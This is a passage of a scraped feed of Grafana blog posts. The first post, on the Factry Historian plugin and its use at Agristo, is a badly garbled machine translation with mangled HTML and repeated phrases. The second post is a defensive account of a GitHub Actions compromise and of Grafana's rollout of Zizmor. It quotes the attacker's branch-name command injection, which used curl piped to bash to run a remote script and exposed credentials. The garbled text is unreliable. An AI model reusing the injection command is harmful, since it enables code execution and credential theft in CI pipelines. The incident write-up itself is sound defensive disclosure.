body-txt”&gt; factry Historian数据源插件的Grafana &lt;/a&gt;解决了这一挑战。通过使用工业数据功能扩展Grafana，工厂可以将原始传感器数据变成清晰的视觉见解。&lt;/p&gt;&#xA;&lt;p&gt;“由Factry历史学家为Grafana提供支持的仪表板，使我们能够简化运营，” Agristo数据工程师Baptist Berlamont说，该公司专门从事冷冻土豆产品的生产和分销。 “我们现在可以立即在设备上跟踪我们的批处理性能，节省时间并驾驶更智能，数据驱动的决定。” &lt;/p&gt;&#xA;&lt;p&gt;继续阅读以了解有关Grafana和Factry Historian如何启用无缝数据访问和分析的更多信息 - 从车间地板到董事会 - 以及如何开始使用数据源开始。&lt;/p&gt;&#xA;&lt;h2 id =“ factry-historian--格拉法纳 - 开放式data-data-driven-inden-i-Insights”&gt; Factry Historian + Grafana：开放数据驱动的Insights &lt;/h2&gt;&#xA;&lt;p&gt;工业公司，特别是在流程行业中&#xA;&lt;a href =“ https://en.wikipedia.org/wiki/programmable_logic_controller” target =“ _ blank” rel =“ noopener noreferrer”&gt; plcs &lt;/a&gt;和&#xA;&lt;这些系统从数万传感器中产生大量的时间序列数据，从而不断监视过程条件。然而，将这些数据变成可行的见解仍然是一个重大障碍。&lt;/p&gt;&#xA;&lt;p&gt;传统上，访问和分析生产数据仅限于使用供应商锁定的历史学家软件的少数工程师。历史学家是旨在从工业流程收集，存储和检索时间序列数据的专业数据库。它们针对高速数据记录进行了优化，并且通常用于跟踪传感器值，机器状态和其他关键指标。 &lt;/p&gt;&#xA;&lt;p&gt;由于这些系统的复杂性和许可限制，非技术用户（例如过程工程师，运营商和优质团队）通常不会直接访问数据，从而限制了他们做出明智决定的能力。&lt;/p&gt;&#xA;&lt;p&gt; at&#xA;&lt;a href =“ https://www.factry.io/” Target =“ _ blank” rel =“ noopener noreferrer”&gt; factry &lt;/a&gt;，我们构建了现代历史学软件，非常专注于易用性。通过使用开源组件，我们创建了灵活的供应商中立解决方案，这些解决方案足以让任何人使用，而无需深厚的技术技能。我们的目标是使工厂中的每个角色（从运营商到董事会房间）都能获得视觉过程见解。越来越多的用户需要访问流程改进并解决运营挑战，包括没有技术专长的挑战。&lt;/p&gt;&#xA;&lt;p&gt;多年来，Factry&#xA;&lt;a href =“ https://coussej.github.io/2016/04/18/building-an-open-source-process-historian/” target =“ _ blank” rel =“ noopener noreferrer”&gt;对grafaana in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial in Industrial。由于Grafana为时间序列的可视化提供了大力支持，因此自然地适合分析大量操作数据。&lt;/p&gt;&#xA;&lt;h2 id =“挑战降低时间序列序列探索”&gt;挑战：简化时间序列数据探索&lt;/h2&gt;&#xA;&lt;p&gt;解锁过程数据是一回事。理解它是另一回事。工业团队经常在许多历史学家系统和数据库中构造的方式，在有效检索和情境化的时间序列数据方面面临挑战。&lt;/p&gt;&#xA;&lt;p&gt;使用植物中时间序列数据的常见挑战包括：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; &lt;strong&gt;平面数据结构&lt;/strong&gt;使得很难在成千上万的收集值之间找到相关的指标。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;在时间序列数据库中基于标签的组织&lt;/strong&gt;可能引入连续性问题，例如资产结构发生变化的时间序列。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;默认查询行为&lt;/strong&gt;可能会导致误导性结果，例如在多个传感器上平均数据，而不仅仅是一个。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;复杂的查询语言&lt;/strong&gt;（例如通量或SQL）可能会使缺乏编程技能的工厂用户感到不知所措。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;此外，仅存储和可视化时间序列数据对于工业电力用户来说还不够。他们还需要：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; &lt;strong&gt;层次浏览&lt;/strong&gt;。一个&#xA;&lt;a href =“ https://www.isa.org/standards-and-publications/isa-standards/isa-standards/isa-88-standards“ target =” _ black“ rel =” noopener noreferrer“&gt; isa88/95/95/95/95 &lt;/a&gt; style设备模型在结构化的树中，而不是&lt;/&#xA;&lt;li&gt; &lt;strong&gt;自动元数据处理&lt;/strong&gt;。加载测量，缩放和HI/LO边界的装载单元自动显示出有意义的数据。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;高级事件覆盖&lt;/strong&gt;。在时间序列数据之上将生产事件分层的选项，实现更深入的过程分析。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id =“实体 - 实验室 -   - 戴塔 - 苏里奇 - 毛法那”&gt;解决方案：grafana的Factry Historian数据源&lt;/h2&gt;&#xA;&lt;p&gt;为了应对这些挑战，Factry为Grafana构建了Factry Historian数据源插件。 &lt;/p&gt;&#xA;&lt;p&gt;结合&#xA;&lt;a href =“ https://www.factry.io/historian/” target =“ _ blank” rel =“ noopener noreferrer”&gt; factry Historian &lt;/a&gt;具有工业环境中的Grafana功能，数据源为技术和非技术用户提供了一种直观的方式，可以探索和分析其数据。 &lt;/p&gt;&#xA;&lt;p&gt;用户从Grafana强大的可视化功能中受益，&lt;strong&gt;增强了特定于行业的要求&lt;/strong&gt;以反映现实世界中的工厂运营。 &lt;/p&gt;&#xA;&lt;p&gt;数据源提供以下功能，以简化团队如何与过程数据进行交互，降低复杂性并使更多用户可以访问洞察力。&lt;/p&gt;&#xA;&lt;h3 id =“ 1-浏览测量结果 - 遵循to-An-Asset结构”&gt; 1。根据资产结构的浏览测量&lt;/h3&gt;&#xA;&lt;p&gt;由于Factry历史学家中的数据是根据资产层次结构构建的，因此Grafana用户可以快速浏览此结构以查找相关数据，而无需记住复杂的标签名称。例如，在下面的屏幕截图中，我们正在浏览&lt;strong&gt; Enterprise &lt;/strong&gt;&gt;&gt; &lt;strong&gt; site &lt;/strong&gt;&gt; &lt;/strong&gt;&gt; &lt;strong&gt; &lt;/strong&gt;&gt;&gt;&gt; &lt;/strong&gt;&gt; &lt;strong&gt;设备&lt;/strong&gt;&gt; &lt;strong&gt; &lt;/prat&gt; tag &lt;/p&gt; &lt;/p&gt;的资产层次结构。&lt;/strong&gt;&gt; &lt;strong&gt;。&lt;/p&gt;。&lt;/p&gt;。&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/博客/factry-historian-data-source/资产结构1.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/factry-historian-data-source/Asset-scrupture-1.png” data-srcset =“/媒体/blog/factry-historian-data-source/sist-source/sist-srupture-1.png？ 550W，/media/blog/factry-historian-data-source/asset-scrupture-1.png?w=750 750w，/media/blog/factry-historian-data-source/asset-source/asset-sonstructure-1.png？ /Media/blog/factry-historian-data-source/asset-scrupture-1.png?w=1040 1040W，/media/blog/factry-historian-data-source/asset-source/asset-scrupture-1.png？ /Media/blog/factry-historian-data-source/asset-scrupture-1.png?w=1920W = 1920W“&#xA;data-sizes =“ auto” alt =“仪表板的屏幕截图，显示如何根据资产结构浏览测量。“ width =“ 1999”高度=“ 1022”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/factry-historian-data-source/资产结构1.png”&#xA;alt =“仪表板的屏幕截图，显示如何根据资产结构浏览测量。” width =“ 1999”高度=“ 1022”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;由于测量的&lt;strong&gt;单位&lt;/strong&gt;是在Factry Historian中配置的，因此它们会自动加载到Grafana中。例如，如果您的传感器在°C下测量温度，则系统还可以提供相关的&lt;strong&gt; min和最大值&lt;/strong&gt;（例如0°C  -  250°C）和&lt;strong&gt; HI/LO/LO边界&lt;/strong&gt;。这样，您可以轻松地配置Grafana以显示对您的过程有意义的阈值。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figure-wrapper figure-wrapper__lightbox W-100p”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/博客/factry-historian-data-source/资产结构2.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/factry-historian-data-source/Asset-Scrupture-2.png” data-srcset =“/媒体/blog/factry-historian-data-source/sist-source/sist-sructure-scrupture-2.png？ 550W，/media/blog/factry-historian-data-source/asset-scrupture-2.png?w=750 750W，/media/Blog/factry-historian-data-source/asset-source/asset-scrupture-2.png?w=900 900w， /Media/blog/factry-historian-data-source/asset-scrupture-2.png?w=1040 1040W，/media/Blog/factry-historian-data-source/asset-source/asset-scrupture-2.png？ /Media/blog/factry-historian-data-source/asset-scrupture-2.png?w=1920 1920w“&#xA;data-sizes =“ auto” alt =“仪表板的屏幕截图，演示了如何配置grafana以显示阈值。“ width =“ 1999”高度=“ 1020”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/factry-historian-data-source/资产结构2.png”&#xA;alt =“仪表板的屏幕截图，演示了如何配置Grafana以显示阈值。” width =“ 1999”高度=“ 1020”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;h3 id =“ 2制造仪表板 - 可用的grafana-variables”&gt; 2。通过使用Grafana变量重复使用仪表板&lt;/h3&gt;&#xA;&lt;p&gt;&#xA;&lt;a href =“/docs/grafana/最新/dashboards/variables/”&gt;仪表板变量&lt;/a&gt;是一个强大的Grafana功能，尤其是在工业环境中。生产公司通常具有多个类似的生产线或反应堆，他们希望以一致的方式跟进它们。通过利用Grafana变量，您可以构建一个仪表板并重复使用不同的设备。&lt;/p&gt;&#xA;&lt;p&gt; Grafana的Factry历史学家数据源支持与不同的Factry历史学家元素相对应的变量：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; &lt;strong&gt;资产&lt;/strong&gt;：从您配置的资产结构中选择父资产。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;资产属性&lt;/strong&gt;：假设每个反应器具有“温度”，“压力”和“能量使用”特性。这些将出现在下拉列表中。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;事件类型&lt;/strong&gt;：如果Factry历史学家设定检测批处理和停机事件，则会出现在下拉菜单中。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;事件类型属性&lt;/strong&gt;：对于每批，您可以存储批量，食谱，酵母菌菌株 - 这些属性已加载在下拉菜单中。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;测量&lt;/strong&gt;：生成Factry Historian的可过滤度量列表。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;数据库&lt;/strong&gt;：如果使用多个时间序列数据库（也许在不同的站点上），您可以过滤或选择要查询的数据库。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/博客/factrY-Historian-Data-source/support-for-for-variables.png“&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/factry-historian-data-source/support-for-variables.png” data-srcset =“/媒体/blog/factry-histryian-data-source/support-soupterce/support-for-variables.png？w = 320 320w， /Media/blog/factry-historian-data-source/support-for-variables.png?w=550 550W，/media/blog/factry-historian-data-source/support-for-for-variables.png？ /Media/blog/factry-historian-data-source/support-for-variables.png?w=900 900W，/media/Blog/factry-historian-data-source/support-for-for-variables.png？ /Media/blog/factry-historian-data-source/support-for-variables.png?w=1240 1240W，/media/Blog/factry-historian-data-source/support-for-for-for-for-for-for-for-variables.png?w=1920 1920w&#39;&#xA;data-sizes =“ auto” alt =“使用变量的grafana仪表板的屏幕截图。” width =“ 1999”高=“ 838”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/factry-historian-data-source/support-for-for-variables.png”&#xA;alt =“使用变量的Grafana仪表板的屏幕截图。” width =“ 1999”高度=“ 838”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;h3 id =“ 3填充 -  Quick-visual-overviews”&gt; 3。为快速视觉概述添加注释&lt;/h3&gt;&#xA;&lt;p&gt;注释可让您在Grafana图上以行或区域的形式放置上下文信息。这使您可以快速将生产事件与过程趋势相关联，从而加速根本原因分析。 &lt;/p&gt;&#xA;&lt;p&gt;在工业应用中，您可能有：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; a &lt;strong&gt;停机事件&lt;/strong&gt;您想以失败原因突出显示，或者&lt;/li&gt;&#xA;&lt;li&gt; a &lt;strong&gt;批处理生产周期&lt;/strong&gt;用批处理或食谱注释。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;使用Factry Historian数据源插件，用户可以快速选择事件（例如，停机事件）并检索其批处理或食谱字段。然后直接在Grafana的时间序列趋势上显示为注释。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/博客/factry-historian-data-source/annotations.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/博客/factry-historian-data-source/annotations.png” data-srcset =“/媒体/blog/factry-historian-data-source/annotations.png？w = 320 320w？ /Media/blog/factry-historian-data-source/annotations.png?w=750 750W，/media/Blog/factry-historian-data-source/annotations.png?w=900 900w，/media/media/blog/factry-historian-historian-dataa-sourtace/ann0004040404040404040404040404040404040404 /Media/blog/factry-historian-data-source/annotations.png?w=1240 1240W，/media/Blog/factry-historian-data-source/annotations.png?w=1920 1920w“&#xA;data-sizes =“ auto” alt =“带有注释的grafan仪表板的屏幕截图。” width =“ 1999”高=“ 983”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/factry-historian-data-source/annotations.png”&#xA;alt =“带有注释的Grafan仪表板的屏幕截图。” width =“ 1999”高度=“ 983”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;h2 id =“成功阶层的自由服务 - 纳分析 -  at-agristo”&gt;成功故事：Agristo的自助服务分析&lt;/h2&gt;&#xA;&lt;p&gt;在比利时建立&#xA;&lt;a href =“ https://agristo.com/” target =“ _ blank” rel =“ noopener noreferrer”&gt; agristo &lt;/a&gt;专门从事冷冻土豆产品的生产和分发。该公司拥有强大的全球业务，为145个国家 /地区的680个客户提供服务，并在全球12个销售办公室运营。 &lt;/p&gt;&#xA;&lt;p&gt;在使用Factry Historian和Grafana之前，工程师和其他利益相关者很难在没有OT和IT支持的情况下访问流程数据。现在，Agristo使用Factry Historian数据源来使Grafana轻松构建，维护和部署标准化的临时仪表板。 &lt;/p&gt;&#xA;&lt;p&gt;“为了调查机油泄漏，我迅速创建了一个仪表板监测储罐和烤箱中的油位，” Agristo的工程工程师Nathan van der Eecken说。 “早期数据表明，一个烤箱的消费量比预期的40％。跟踪这将有助于查明问题的原因。” &lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：6081px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-Link字幕”&#xA;href =“/媒体/博客/factry-historian-data-source/agristo-grafana-dashboards.jpg”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload MB-0”&#xA;data-src =“/媒体/博客/factry-historian-data-source/agristo-grafana-dashboards.jpg“ data-srcset =”/媒体/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg？ /media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=550 550W，/media/Blog/factry-historian-data-source/agristo-grafana-data-source/agristo-grafana-dashboards.jpg？ /Media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=900 900W，/media/blog/factry-historian-data-source/agristo-grafana-data-source/agristo-grafana-dashboards.jpg?w=1040 1040w， /Media/blog/factry-historian-data-source/agristo-grafana-dashboards.jpg?w=1240 1240W，/media/Blog/factry-historian-data-source/agristo-gristo-grafana-data-source/agristo-grafana-dashboards.jpg？&#xA;data-sizes =“ auto” alt =“使用Grafana仪表板的Nathan van der Eecken的照片。” width =“ 6081” height =“ 4054” title =“*Nathan van der eecken，Agristo的过程工程师Nathan van der eecken，Agristo的过程工程师，他们使用grafafana for Grafafana Ad-aD-aD-aD-buld of Standard Adstand/agrand Installe/and sandarts/buald&gt; d distarts/sptarts instarts/sattralsight&gt;*d。&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/factry-historian-data-source/agristo-grafana-dashboards.jpg”&#xA;Alt =“ Agristo的过程工程师Nathan van der Eecken的照片，使用Grafana Dashboards。” width =“ 6081”高度=“ 4054” title =“*Nathan van der Eecken，Agristo的过程工程师Nathan van der Eecken，他们使用Grafana来构建标准化的Ad-Hoc dash-hoc dash dash dash dash dash dash dash dash dash dash dash dash dash dash dash dashboards dash dashboards dash dash dash boards dash dashboards dash dashboards。&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;figcaption class =“ W-100P字幕Text-Gray-13”&gt; &lt;em&gt; Nathan van der Eecken，Agristo的过程工程师，他们在那里使用Factry Historian数据源来构建标准化的临时仪表板。&lt;/em&gt; &lt;/em&gt; &lt;/figcaption&gt; &lt;/a&gt; &lt;/fige&gt;&#xA;&lt;p&gt;用户现在可以独立访问数据，将关键的生产数据纳入需要它的每个人的手中，而无需查询构建器或编辑器。&lt;/p&gt;&#xA;&lt;p&gt;“与Factry Historian和Grafana一起，人们现在可以参与数据，了解其含义并采取行动来增强运营，” Van der Eecken说。 “这不仅仅是监视过程，还与安装学习和改进文化有关。” &lt;/p&gt;&#xA;&lt;p&gt;强烈关注可持续性，创新和卓越运营，阿格里斯托对Factry Historian和Grafana的使用有助于他们优化生产流程，提高效率并简化故障排除。&lt;/p&gt;&#xA;&lt;p&gt;“通过使Grafana Protiflward中的批处理覆盖，该插件使我们能够将质量数据与时间序列数据相关联，” Agristo数据工程师Baptist Berlamont说。 “对于解决我们的运营进行故障排除和改善，这是必不可少的。” &lt;/p&gt;&#xA;&lt;H2 ID =“包装和隔离步骤”&gt;包装和下一步&lt;/h2&gt;&#xA;&lt;p&gt;通过将Grafana强大的可视化平台与Factry Historian的工业数据功能相结合，制造商获得了一种可访问，灵活和可扩展的解决方案，以进行过程数据分析。&lt;/p&gt;&#xA;&lt;p&gt;使用Grafana的Factry数据源插件，您可以从以下功能中受益，以将原始数据转化为有意义的见解：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;结构化资产浏览消除了记忆标签名称的需要。&lt;/li&gt;&#xA;&lt;li&gt;可重复使用的仪表板减少设置时间并标准化性能监视。&lt;/li&gt;&#xA;&lt;li&gt;事件覆盖提供了实时上下文，以提供更好的决策。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;要了解有关Grafana的Factry Historian数据源插件的更多信息，请查看此信息&#xA;&lt;a href =“/grafana/plugins/factry-historian-datasource/”&gt;概述页面&lt;/a&gt;。您可以通过检查一下来探索并开始与Factry历史学家一起开始&#xA;&lt;a href =“ https://github.com/factrylabs/historian” target =“ _ blank” rel =“ noopener noreferrer”&gt; github存储库&lt;/a&gt;，其中包括一个可用的docker docker complose docker complose docker complose complose complote intermose complose complose complose complate intermose complote and optful opent启动指南。&lt;/p&gt;&gt; &lt;/p&gt;&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p&gt;。</description>
      <pubDate>Fri, 20 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【How to detect vulnerable GitHub Actions at scale with Zizmor】如何使用Zizmor大规模检测脆弱的GitHub动作</title>
      <link>https://grafana.com/blog/2025/06/26/how-to-detect-vulnerable-github-actions-at-scale-with-zizmor/</link>
      <description>【&lt;p&gt;As we previously reported on April 26, 2025, we had a&#xA;&lt;a href=&#34;/blog/2025/04/27/grafana-security-update-no-customer-impact-from-github-workflow-vulnerability/&#34;&gt;security incident&lt;/a&gt; via an insecure GitHub Action and we have since published&#xA;&lt;a href=&#34;/blog/2025/05/15/grafana-security-update-post-incident-review-for-github-workflow-vulnerability-and-whats-next/&#34;&gt;a post-incident review&lt;/a&gt;. We have confirmed that there has been no code modification, unauthorized access to production systems, exposure of customer data, or access to personal information. &lt;/p&gt;&#xA;&lt;p&gt;In light of the incident and as part of our ongoing efforts to harden our infrastructure and pipelines, we have introduced Zizmor in our CI/CD pipelines for all repositories to detect and prevent potentially vulnerable GitHub Actions. &lt;/p&gt;&#xA;&lt;p&gt;Zizmor is an open source static analysis tool developed by William Woodruff, and Grafana Labs is partnering with Woodruff as a sponsor of the Zizmor project. Before we dive into the details of how we’ve deployed Zizmor, let’s first talk about the vulnerability that the attacker used against us.&lt;/p&gt;&#xA;&lt;h2 id=&#34;about-the-github-actions-vulnerability&#34;&gt;About the GitHub Actions vulnerability&lt;/h2&gt;&#xA;&lt;p&gt;At Grafana Labs, we use GitHub Actions as our primary&#xA;&lt;a href=&#34;https://aws.amazon.com/devops/continuous-integration/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;continuous integration&lt;/a&gt; system and we enable our teams to build and test the code they develop. GitHub Actions enables teams to define their own repeatable build and test processes that run alongside the code they write, which can then be triggered by a host of events from inside GitHub.&lt;/p&gt;&#xA;&lt;p&gt;A vulnerable GitHub Action, utilizing pull-request-target instead of the safer pull-request, led to a security incident in April. This allowed an unauthorized user to execute code from a malicious branch within a trusted environment. By naming their branch to trigger a command (essentially using &lt;code&gt;(&#39;child_process&#39;).exec(&#39;curl$(IFS)-pathtofile$(IFS)bash&#39;&lt;/code&gt;) the attacker was able to run a remote script. This script then exposed environment variables, including credentials, within the trusted environment.&lt;/p&gt;&#xA;&lt;p&gt;We are proud that our proactive security measures were activated as planned. Our canary tokens alerted us when their use had been attempted. Because Grafana Labs has a globally distributed workforce, we had engineers who jumped on our alerts almost immediately, and we were able to coordinate work across teams and time zones to shut down credentials, access, actions, and automations quickly and decisively.&lt;/p&gt;&#xA;&lt;p&gt;Our investigation into the incident wrapped up May 12, 2025, and &lt;strong&gt;we confirmed that there has been no code modification, unauthorized access to production systems, exposure of customer data, or access to personal information.&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;h2 id=&#34;introducing-zizmor&#34;&gt;Introducing Zizmor&lt;/h2&gt;&#xA;&lt;p&gt;Now that we have a shared understanding of the problem, let’s dive into how we will prevent such problems from arising in the future. In other areas of code, we often employ static analysis to detect common vulnerabilities or weaknesses (&#xA;&lt;a href=&#34;https://cwe.mitre.org/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;CWEs&lt;/a&gt;). There are a couple of tools that are available for statically analyzing GitHub Actions. GitHub’s own&#xA;&lt;a href=&#34;https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;CodeQL&lt;/a&gt; has the ability to detect a wide variety of attacks. There’s also Step Security’s hardened runner, which enables teams to do a deeper inspection of what actions are doing when they run. However, the tool that we settled on using across our estate is the open source project Zizmor.&lt;/p&gt;&#xA;&lt;p&gt;To mitigate the GitHub Actions incident, a large effort was undertaken by not only the security team at Grafana Labs, but also the entire engineering department to run Zizmor against all of our GitHub Actions in repositories. Zizmor picks up not just uses of `pull_request_target` but also a whole host of&#xA;&lt;a href=&#34;https://docs.zizmor.sh/audits/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;audit rules&lt;/a&gt;, such as forbidden-uses and unpinned-uses.&lt;/p&gt;&#xA;&lt;p&gt;After the&#xA;&lt;a href=&#34;https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;tj-actions incident&lt;/a&gt; with reviewdog, in which a third-party supply chain attack was introduced targeting specific repositories,  Grafana Labs’ security team made a decision to restrict the usage of reviewdog actions. Using Zizmor with the forbidden uses allows us to additionally put in technical blocks to prevent the usage of this set of actions within our repositories. In order to prevent future attacks where a tag has been overwritten with a new commit, Zizmor also audits the use of unpinned versions of actions, instead preferring an explicit commit with a YAML comment to the tag that it relates to.&lt;/p&gt;&#xA;&lt;h2 id=&#34;zizmor--grafana-labs&#34;&gt;Zizmor + Grafana Labs&lt;/h2&gt;&#xA;&lt;p&gt;We’ve now understood the problem, the tooling that we can use to prevent the issue going forward, so how do we use this at Grafana Labs? We started by&#xA;&lt;a href=&#34;https://github.com/grafana/shared-workflows/blob/main/.github/workflows/reusable-zizmor.yml&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;writing a reusable workflow&lt;/a&gt; in a public repository that we use across Grafana Labs, but that can also be used across all organizations that utilize GitHub Actions.&lt;/p&gt;&#xA;&lt;p&gt;The reusable workflow does a couple of things. First, it tries to establish the Zizmor configuration that we publicly define in that repository. This is the &lt;strong&gt;default&lt;/strong&gt; that we use, but it is not used if the repository defines its own configuration, unless of course you set the &lt;code&gt;always-use-default-config parameter&lt;/code&gt;. It then runs Zizmor, twice — once to produce a&#xA;&lt;a href=&#34;https://sarifweb.azurewebsites.net/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;SARIF report&lt;/a&gt; and the other in a human readable comment form. We then try to upload the SARIF version to GitHub code scanning. (&lt;em&gt;Note: This is free if your repository is public.&lt;/em&gt;) Finally the workflow decides its exit status based on the result of the Zizmor run, and this informs the GitHub Action check status.&lt;/p&gt;&#xA;&lt;p&gt;This is great, but we want to run this for more than 2,000 repositories and we don’t want to have to update every repository to point at this repository. Enter&#xA;&lt;a href=&#34;https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-organization-settings/creating-rulesets-for-repositories-in-your-organization&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;GitHub Organization rulesets&lt;/a&gt;. These are like the rulesets that you can apply to a single repository, but instead you can apply them against all repositories in your organization.&lt;/p&gt;&#xA;&lt;p&gt;The great thing about this is that we only need to define the workflow once. We opted to do this in a&#xA;&lt;a href=&#34;https://github.com/grafana/security-github-actions/blob/main/.github/workflows/self-zizmor.yaml&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;repository that’s controlled by the security team&lt;/a&gt; at Grafana Labs, but we took a lot of inspiration from the shared-workflows repository. Here we can define the parameters to which we want this workflow to run, pin the version, and define other behaviors that we expect to hold true from the workflow runs. In this example, we check whether there are any workflows to run against before we run Zizmor. (There’s no point running it against zero targets!)&lt;/p&gt;&#xA;&lt;p&gt;Now that we have an action, we can use rulesets to roll this out to all of the repositories in our organization. We use the “Require workflows to pass before merging” check to define that from the security controlled repository.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1898px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/zizmor/ruleset-configuration-zizmor.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/zizmor/ruleset-configuration-zizmor.png&#34;data-srcset=&#34;/media/blog/zizmor/ruleset-configuration-zizmor.png?w=320 320w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=550 550w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=750 750w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=900 900w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=1040 1040w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=1240 1240w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;GitHub Branch Ruleset configuration for zizmor workflow&#34;width=&#34;1898&#34;height=&#34;588&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/zizmor/ruleset-configuration-zizmor.png&#34;&#xA;alt=&#34;GitHub Branch 